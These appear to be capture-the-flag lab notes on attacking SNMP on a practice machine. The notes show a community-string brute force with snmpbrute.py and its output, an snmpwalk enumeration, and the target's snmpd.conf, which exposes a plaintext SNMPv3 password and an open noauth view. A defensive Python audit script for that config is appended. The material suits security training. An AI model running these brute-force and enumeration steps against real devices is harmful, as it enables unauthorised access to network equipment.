SNMP brute force community string
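onesixtyone and hydra can also be used, but this time the tool that produced correct results was snmp-brute.py
(They do the same thing, but this drove home the importance of using multiple tools.)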
code:snmp-brute
$ python3 snmpbrute.py -b -a -t 10.10.11.193 -f snmp-onesixtyone.txt
/usr/lib/python3/dist-packages/scapy/layers/ipsec.py:462: CryptographyDeprecationWarning: Blowfish has been deprecated
cipher=algorithms.Blowfish,
/usr/lib/python3/dist-packages/scapy/layers/ipsec.py:476: CryptographyDeprecationWarning: CAST5 has been deprecated
cipher=algorithms.CAST5,
_____ _ ____ _______ ____ __
/ ___// | / / |/ / __ \ / __ )_______ __/ /____
\__ \/ |/ / /|_/ / /_/ / / __ / ___/ / / / __/ _ \
___/ / /| / / / / ____/ / /_/ / / / /_/ / /_/ __/
/____/_/ |_/_/ /_/_/ /_____/_/ \__,_/\__/\___/
SNMP Bruteforce & Enumeration Script v2.0
###############################################################
Trying ['public', 'private', '!@#$
...,
'Zxcvbnm', 'zzz'] community strings ...
10.10.11.193 : 161 Version (v1): public
10.10.11.193 : 161 Version (v2c): public
10.10.11.193 : 161 Version (v2c): internal
Trying identified strings for READ-WRITE ...
Identified Community strings
0) 10.10.11.193 public (v1)(RO)
1) 10.10.11.193 public (v2c)(RO)
2) 10.10.11.193 internal (v2c)(RO)
Finished!
Enumerate with snmpwalk using the community string that was found
code:snmpwalk
$ snmpwalk -c internal -v 2c mentorquotes.htb
(The output is huge, so redirect it to a file with tee or similar.)
This target's snmpd.conf:
code:/etc/snmp/snmpd.conf
# Note that setting this value here means that when trying to
# perform an snmp SET operation to the sysLocation.0 variable will make
# the agent return the "notWritable" error code. IE, including
# this token in the snmpd.conf file will disable write access to
# the variable.
# arguments: location_string
sysLocation Sitting on the Dock of the Bay
sysContact Me <admin@mentorquotes.htb>
# sysservices: The proper value for the sysServices object.
# arguments: sysservices_number
sysServices 72
###########################################################################
# SECTION: Agent Operating Mode
#
# This section defines how the agent will operate when it
# is running.
# master: Should the agent operate as a master agent or not.
# Currently, the only supported master agent type for this t
# is "agentx".
#
# arguments: (on|yes|agentx|all|off|no)
master agentx
# agentaddress: The IP address and port number that the agent will listen on.
# By default the agent listens to any and all traffic from any
# interface on the default SNMP port (161). This allows you to
# specify which address, interface, transport type and port(s) that you
# want the agent to listen on. Multiple definitions of this token
# are concatenated together (using ':'s).
# agentaddress 127.0.0.1,::1
agentAddress udp:161,udp6:::1:161
###########################################################################
# SECTION: Access Control Setup
#
# This section defines who is allowed to talk to your running
# snmp agent.
# Views
# arguments viewname included oid
# system + hrSystem groups only
view systemonly included .1.3.6.1.2.1.1
view systemonly included .1.3.6.1.2.1.25.1
# rocommunity: a SNMPv1/SNMPv2c read-only access community name
# Read-only access to everyone to the systemonly view
rocommunity public default -V systemonly
rocommunity6 public default -V systemonly
# SNMPv3 doesn't use communities, but users with (optionally) an
# authentication and encryption string. This user needs to be created
# with what they can view with rouser/rwuser lines in this file.
#
# e.g.
# createuser authPrivUser SHA-512 myauthphrase AES myprivphrase
#
# This should be put into /var/lib/snmp/snmpd.conf
#
# rouser: a SNMPv3 read-only access username
# arguments: username [noauth|auth|priv [OID | -V VIEW CONTEXT]]
rouser authPrivUser authpriv -V systemonly
# include a all *.conf files in a directory
includeDir /etc/snmp/snmpd.conf.d
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
#view SystemView included .1.3.6.1.2.1.1
view SystemView included .1.3.6.1.2.1.25.1.1
view AllView included .1
access AllGroup "" any noauth exact AllView none none
(createUser username (MD5|SHA) authentication-password [DES|AES encryption-password])
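A defender's reading of the same file, as an added example (not part of the original notes and not net-snmp code): a small Python audit that flags the directives which let the `internal` community read the whole tree from any host. The rule names are made up for this example, and only the simple directive forms shown in the snmpd.conf above are handled.

```python
import shlex

# Active directives copied from the snmpd.conf above (comments dropped).
SAMPLE_CONF = """\
rocommunity public default -V systemonly
createUser bootstrap MD5 SuperSecurePassword123__ DES
rouser bootstrap priv
com2sec AllUser default internal
group AllGroup v2c AllUser
view AllView included .1
access AllGroup "" any noauth exact AllView none none
"""

def audit_snmpd_conf(text):
    """Return sorted (line_no, rule, detail) findings for snmpd.conf text."""
    findings, wide_views, accesses = [], set(), []
    for no, raw in enumerate(text.splitlines(), 1):
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        try:
            key, *args = shlex.split(raw)
        except ValueError:  # unbalanced quote in a free-text value
            key, *args = raw.split()
        key = key.lower()
        if key.startswith(("rocommunity", "rwcommunity")) and args:
            # rocommunity COMMUNITY [SOURCE [...]]: no source means any host
            if len(args) < 2 or args[1] == "default":
                findings.append((no, "community-any-source", args[0]))
        elif key == "com2sec" and len(args) >= 3:
            # com2sec SECNAME SOURCE COMMUNITY
            if args[-2] == "default":
                findings.append((no, "community-any-source", args[-1]))
        elif key == "view" and len(args) >= 3:
            if args[1] == "included" and args[2].strip(".") == "1":
                wide_views.add(args[0])
                findings.append((no, "view-whole-tree", args[0]))
        elif key == "access" and len(args) >= 6:
            # access GROUP CONTEXT MODEL LEVEL PREFIX READ WRITE NOTIFY
            accesses.append((no, args[0], args[3], args[5]))
        elif key == "createuser" and len(args) >= 3:
            # createUser USER AUTHPROTO AUTHPASS [PRIVPROTO [PRIVPASS]]
            weak = [a for a in (args[1], *args[3:4]) if a.upper() in ("MD5", "DES")]
            if weak:
                findings.append((no, "weak-usm-algorithm", "/".join(weak)))
            findings.append((no, "passphrase-in-config", args[0]))
    for no, group, level, read_view in accesses:  # views may be defined later
        if level == "noauth" and read_view in wide_views:
            findings.append((no, "noauth-read-whole-tree", group))
    return sorted(findings)
```

On the sample, lines 4, 6 and 7 together are the chain behind the snmpwalk above: a community accepted from any source, mapped to a group whose read view is `.1`.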